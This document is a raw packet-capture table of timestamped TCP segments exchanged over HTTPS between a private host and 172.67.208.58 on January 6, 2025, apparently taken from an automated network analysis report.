                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.098953962 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.098963022 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.098972082 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099005938 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099159956 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099236012 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099512100 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099570036 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099644899 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099689960 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099860907 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099889994 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099914074 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099921942 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099932909 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.099970102 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.100466967 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.100524902 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.100651979 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.100698948 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.136661053 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.136729002 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184508085 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184556007 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184565067 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184572935 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184602976 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184609890 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184649944 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184654951 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184659958 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184699059 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184890032 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.184948921 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.185280085 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.185317993 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.185340881 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.185343981 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.185368061 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.185385942 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.185939074 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.185961962 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.186016083 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.186021090 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.186058044 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.186517000 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.186532974 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.186567068 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.186572075 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.186594963 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.186614037 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.189810038 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.189826012 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.189881086 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.189883947 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.189930916 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.190371990 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.190387011 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.190459013 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.190464020 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.190495968 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.190906048 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.190921068 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.190974951 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.190978050 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.191018105 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273072958 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273102999 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273150921 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273156881 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273180008 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273217916 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273730993 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273752928 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273811102 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273816109 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.273855925 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274110079 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274131060 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274224043 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274224043 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274229050 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274627924 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274646997 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274684906 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274689913 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274719000 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.274743080 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275087118 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275099993 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275135994 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275140047 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275162935 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275181055 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275748014 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275764942 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275799036 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275804043 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275825977 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275849104 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276344061 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276360035 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276413918 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276426077 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276432037 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276467085 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276500940 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361568928 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361588001 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361654043 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361691952 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361706018 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361797094 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362060070 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362076998 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362126112 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362133026 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362181902 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362351894 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362658978 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362673998 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362735033 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362740993 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362792015 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363168955 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363193989 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363235950 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363240957 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363265991 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363284111 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363723993 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363739967 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363784075 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363789082 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363812923 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363832951 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364262104 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364276886 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364326954 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364331007 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364352942 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364370108 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364654064 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364669085 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364710093 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364713907 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364737988 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364748955 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.365531921 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.365547895 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.365598917 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.365603924 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.365652084 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450051069 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450069904 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450113058 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450119972 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450136900 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450170040 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450671911 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450690031 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450731039 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450741053 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450763941 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450776100 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451190948 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451237917 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451252937 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451258898 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451281071 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451302052 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451683044 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451697111 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451741934 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451746941 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451786041 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452528954 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452547073 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452584028 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452584982 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452593088 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452611923 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452616930 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452631950 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452636957 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452656031 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452677011 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453421116 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453442097 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453496933 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453505039 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453505039 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453509092 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453521013 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453545094 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453583002 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453586102 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.453644991 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.538728952 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.538747072 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.538804054 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.538811922 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.538853884 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539045095 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539062023 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539133072 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539133072 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539138079 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539207935 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539529085 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539562941 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539587975 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539592028 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539634943 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539650917 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539913893 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539949894 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539963007 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539966106 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.539993048 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540015936 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540235043 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540251017 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540304899 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540309906 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540349007 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540775061 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540791988 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540839911 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540843964 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540869951 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.540889978 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541115046 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541145086 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541177034 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541182995 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541219950 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541229010 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541286945 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541620970 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541637897 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541690111 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541695118 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541728973 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541743040 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.541940928 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.636847973 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.636868000 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.636919975 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.636945009 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.636970043 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.636986017 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.650954962 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.650968075 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.651015043 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.651037931 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.651051998 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.651074886 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.665054083 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.665067911 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.665128946 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.665153027 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.665252924 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.679248095 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.679263115 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.679337025 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.679361105 CET44349927172.67.208.58192.168.2.5
